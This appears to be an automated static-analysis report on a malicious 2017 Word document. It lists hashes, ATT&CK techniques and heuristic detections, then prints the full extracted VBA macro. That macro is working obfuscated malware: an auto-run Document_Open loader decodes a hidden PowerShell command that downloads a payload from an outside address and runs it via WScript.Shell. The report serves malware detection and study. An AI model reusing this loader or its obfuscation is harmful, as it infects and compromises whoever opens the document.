Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 14841af0dcc048e8…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 174.0 KB
Created: 2017-02-22 05:43:00
Authoring application: Microsoft Office Word
First seen: 2017-02-27
MD5: 475d6afa34a6b8e43145396b92502a87
SHA-1: 1c61aef8e6160b25c08a01b4810f756dd1ff7793
SHA-256: 14841af0dcc048e841f49ca758eebda6ade60c557580f6d0bc68dac12754b10e
Risk score: 290

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample contains obfuscated VBA macros, including a Document_Open auto-execution routine. Critical heuristics indicate the presence of CreateObject and Shell calls, suggesting the macro attempts to execute arbitrary code. The reconstructed string 'RcB8m8ZdXR.qJeX8xJe8Z 8/Rczz Zp8oBwBRezBrksZ9h8qeJ8l8lZZ.zeX8xzeq J-RwR8 ZhZRiBdqdRke8n9J 99-z9nZXoqBpJ R-qBeRqp8 XJbXXyqXpXa8qsB8s9 B(zqN8eRwX8-ZqO8RbkqjRJe9c9tX qZS9yXBsZt8eqmX.Z9Nq9ektk.9WBeZbXCBql9iRZe9nqtz8)ZZ.JD88o8wXnRzlkZoZJaZ8d88FBiBzl8ek(98'ZJhZXtBtzzpqz:Z8/X/kq1JZ7R96zz.Jz1Z2BZ3q.Z1BZ08.q85k' likely represents a URL or path to a second-stage payload. The ClamAV detection further supports its malicious nature.

Heuristics (8)

  • ClamAV: Doc.Macro.Obfuscated-6395242-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6395242-0
  • VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA (critical) OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    htjjhftgzpddqhmrcvz(1) = "ipt."
    htjjhftgzpddqhmrcvz(2) = "shell"
    coreemotion = 318
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    cqcytsngmoondga = "ugbdxcpfeatqbfg"
    Set gorillainvite = CreateObject(analystcereal())
    For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm)
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    cqcytsngmoondga = "ugbdxcpfeatqbfg"
    Set gorillainvite = CreateObject(analystcereal())
    For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm)
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Document_Open()
    ponyrail = 134
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6939 bytes
SHA-256: 8f556f49005dd7e4f5aa19fa2f6ac519cbfe395fee6c20cc7fddceeb6b9f7234
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
ponyrail = 134
'inheritsibling
'ubdpmdhdjczsrabn
If ponyrail <> 273 Then
'bjczxwlvldlcqblpj
alertginger = 967
myselfsoft = "fnexgwdatbke"
End If
cactusmidnight = 264
'dinosaurtopple
'depthpill
If cactusmidnight <> 41 Then
'dependsign
awmtopqcm = 531
ytkumuutikmxrfgkx = "vcuwstbymwpqfa"
End If
duckunit = "RcB8m8ZdXR.qJeX8xJe8Z 8/Rczz Zp8oBwBRezBrksZ9h8qeJ8l8lZZ.zeX8xzeq J-RwR8 ZhZRiBdqdRke8n9J 99-z9nZXoqB"
healthtransfer = 157
'devoteranch
'clickrude
If healthtransfer <> 908 Then
'examplesetup
kppkbbngerhdjfn = 440
cpvifogkq = "mvelguipnyuoiftv"
End If
crimerocket = 84
'bgebjzlxqzttmgqplb
'gduapapeu
If crimerocket <> 573 Then
'royalweasel
averagelevel = 447
identifyowner = "speaktype"
End If
famefirst = duckunit & "pJ R-qBeRqp8 XJbXXyqXpXa8qsB8s9 B(zqN8eRwX8-ZqO8RbkqjRJe9c9tX qZS9yXBsZt8eqmX.Z9Nq9ektk.9WBeZbXCBql9iRZe9nqtz8)ZZ.JD88o8wXnRzlkZoZJaZ8d88FBiBzl8ek(98'ZJhZXtBtzzpqz:Z8/X/kq1JZ7R96zz.Jz1Z2BZ3q.Z1BZ08.q85k"
'keejohkubfpkgaj
xzhqezjjopmr = 768
conductorgan = "regularscan"
stpdplhtk = 73
'rshuwgoab
'arctictrend
If stpdplhtk <> 205 Then
'fafmfwsjhbl
reliefsnake = 733
bidrack = "bulletopen"
End If
loanmaze = ""
'shikgikqlhzof
sfwcbditkt = 701
gqciidaftrhdvjgxpec = "ddvqlmcdg"

piwtaswcbmaaci = 647
'erkofxlxurjmwjvk
'crkkbythswkegrzhb
If piwtaswcbmaaci <> 419 Then
'tcfoiyayqyalmvjz
sketchtrouble = 637
jewelmobile = "diseasescale"
End If
alienpunch = 291
'pgejroturcxf
'gymnotice
If alienpunch <> 374 Then
'ndohnznoanmbnxc
awdogpawasvgpmxhzbh = 775
qbgtdfvzbequqnglt = "cryhungry"
End If
ActiveDocument.Shapes.SelectAll
noodlerib = 581
'storyugly
'myyqwfuxdc
If noodlerib <> 138 Then
'pyfuqbvudml
eitherwall = 944
gnizmobap = "goatmaster"
End If
'uduaznugihoywho
dinosaurside = 386
enrollgarment = "pfhbaveoj"
Selection.Delete
famefirst = famefirst & "6B/zuqXpB9gBrkaJ9dke8.Z8xX'Bq,z'X%9T88E8MJ8P9%zq\J\98jB9fRZaXZd8BsJqdZf9akksJdRXez.8zeZBxJeXB'XZ)q q9&kB Jzr8eqZgZ Za8zdRdB XHRKqqCq9Uk\8\qBSqoZfZt9JwZaXzrkeJq\q\BC8lBaZsk8sqe89sBk\9\X9m8sZXcXf8ikBlZqe8"
'zlmjmshtt
danceobtain = 786
estateprize = "drivepicnic"
lyzsjrxktzcm = famefirst & "\RZ\XBsZh8eXXl9ZlB8\J\RBo9qpZeJnq\Z\kZcqRoZZmZqmXka8nB9d9B 8z/XdB 8%z8TRJE9MZPJ%8J\9\ZqjZfBzaqd8Js88d" & "BBf8za9ks8d88eq.zqeZxqek8 X9/zf9 B&k BeZ8vX8eRnzZt8Zv9w8zrZ.ZXeq8x8eXq J&Z8 z8PZXIB9N88GZB z-qnkZ 91Bz5R q19R2Z78J.q089.90B.ZZ1q>BnkZuZlk zZ&8X zq%8ZTJE8qMZPzR%kR\8J\ZZjkqf8Xakd8s8zdXZfRa8JsqXd9eX.zezXx9e"
'hqlqdjlbfhoefpnpf
tjjwsntdc = 656
cqcytsngmoondga = "ugbdxcpfeatqbfg"
Set gorillainvite = CreateObject(analystcereal())
For jheprwkrqbnl = 1 To Len(lyzsjrxktzcm)
bponuzsdtomnd = 156
'inmatephysical
'xsomjfyoojuzbpckrri
If bponuzsdtomnd <> 597 Then
'halfresemble
nastypizza = 827
bravepepper = "connectjoin"
End If
crimeservice = Mid(lyzsjrxktzcm, jheprwkrqbnl, 1)
If firespend() Like "*" & crimeservice & "*" Then
'iccurtsftqislahdn
elsepotato = 620
umuejrfgxwed = "fazhaomcfxptb"
physicalteam = 748
'bssjucgfrn
'burgerstreet
If physicalteam <> 193 Then
'addictboring
sxwvcouhwgvxdxdoxkg = 622
elementsting = "ffxxkwqpuiofbtz"
End If
loanmaze = loanmaze
'deputyfat
bronzeexpire = 753
carpetvolcano = "enforcesnap"
jhmtmzvhdnyyxqos = 273
'seventeach
'boatpraise
If jhmtmzvhdnyyxqos <> 92 Then
'pjuqwernfxivicpoyp
dwjkkrzjy = 298
woolqbwxkuirhfi = "laundryshadow"
End If
Else
loanmaze = loanmaze & crimeservice
bklfisunykfqjlilrcs = 812
'qjngvfbfbkxofihk
'lvuskmwka
If bklfisunykfqjlilrcs <> 915 Then
'hxyeasxymqttbb
driftfavorite = 688
enrichpuzzle = "arrivegeneral"
End If
End If
'bfokihpczmrxxxwaseg
jrimgapgdsfqx = 118
hdnbotnrkxk = "ysmwptxsbculngf"
copyover = 915
'jrqxauwahmmlg
'coralorange
If copyover <> 483 Then
'copperhockey
dqwaxovee = 111
cipcsfzrbphkxm = "decidedepth"
End If
Next
ewoeimsldprezgxs = Module1.chaosurge(False, loanmaze, gorillainvite, 3)
gdglnluuuvbr = 222
'eazkxqhcmecevcnagl
'wgznzcqnzsxdm
If gdglnluuuvbr <> 130 Then
'sfptlhexsjtqccexdhk
smilevibrant = 476
uhzsddvuqr = "angletool"
End If
End Sub
Function analystcereal()
'imitateundo
elsefront = 444
idklijzndqlcebkst = "dlkbnzgjh"
'futfxoelnitthlwk
ygkcwchwsh = 184
jaoymweylejxdqhqi = "addictmercy"
Dim htjjhftgzpddqhmrcvz(3)
shieldsix = 691
'gymrotate
'vnuurcdrp
If shieldsix <> 201 Then
'awkwardmerry
adaptcake = 130
uwnyfurnoohuhebe = "spoonstable"
End If
htjjhftgzpddqhmrcvz(0) = "wscr"
'shortthrive
ydlwvtujrmaavtu = 930
delayreward = "ruzjyyyxfyririwil"
butterreplace = 315
'gkvrpntzpuqzyf
'icoeepgsyqnynv
If butterreplace <> 662 Then
'dependpurse
hzutwwbcpxgs = 290
convincelength = "exchangemarble"
End If
htjjhftgzpddqhmrcvz(1) = "ipt."
htjjhftgzpddqhmrcvz(2) = "shell"
coreemotion = 318
'bgcznscqjebiheiyeyi
'paehyiyuuhvkbtfr
If coreemotion <> 387 Then
'algxbmnyabxfx
jungleprison = 305
uzhxxpjhkwizscwp = "flgyrokdwpwfxgkdhln"
End If
analystcereal = Join(htjjhftgzpddqhmrcvz, "")
End Function
Function firespend()
firespend = "qJ8BZz9X8RZk"
End Function

Attribute VB_Name = "Module1"
Function chaosurge(ynjceojrsucjtj, energypen, vzaodorlfhmc, fanproduce)
excuseleopard = 946
'leftceqehpgt
'jlrawrijnjzoban
If excuseleopard <> 132 Then
'borrowtheme
bindwait = 127
uocprzrdtvwrleovrr = "sranlaaqkjgrbuunvm"
End If
beautyexotic = 0
If fanproduce = 3 Then
nmcdjgsraba = vzaodorlfhmc.Run(energypen, ynjceojrsucjtj)
hawktennis = 121
'hardviolin
'qzetwykzksdxfydbrxh
If hawktennis <> 33 Then
'casualerode
zkijcyunrnpml = 702
elitespare = "lbvjrngevyfshkrwg"
End If
'assumerival
ahbqseohg = 385
abstractsurvey = "gsstmhisgvdwtf"
beautyexotic = 1
joncqofkxpkuxg = 109
'delaypull
'petseason
If joncqofkxpkuxg <> 446 Then
'rmuyzdydjr
sticktrend = 948
riskterm = "zcttrvooemg"
End If
ijvujzurqkyx = 290
'lntegpezitornn
'ekihftmeirlnjkeh
If ijvujzurqkyx <> 535 Then
'finishtrim
gsfqoidenqvhghsa = 227
perqyphqpeoekenqza = "lendscience"
End If
End If
gardenmorning = 365
'dgwivdfiw
'egnowrjgrfuqjt
If gardenmorning <> 620 Then
'memberroute
tkuruqkacukldsbxyx = 963
artworkspice = "cautionfossil"
End If
bbcgnikejyovzj = 67
'pricespell
'hwrhelnqbjui
If bbcgnikejyovzj <> 492 Then
'anchorghost
ncbwhkjtxfohihqdjn = 748
mfdrvkszvvihfbwcu = "kfvyuyxvzhvvqrunhb"
End If
chaosurge = beautyexotic
'publictaste
axisdragon = 899
farmlength = "believetravel"
fdvwovjxhlnbgd = 803
'alienfoot
'carpetgown
If fdvwovjxhlnbgd <> 390 Then
'dryhalf
lfsodlzpwedzfzmbz = 447
qnmuyexyu = "entersound"
End If
End Function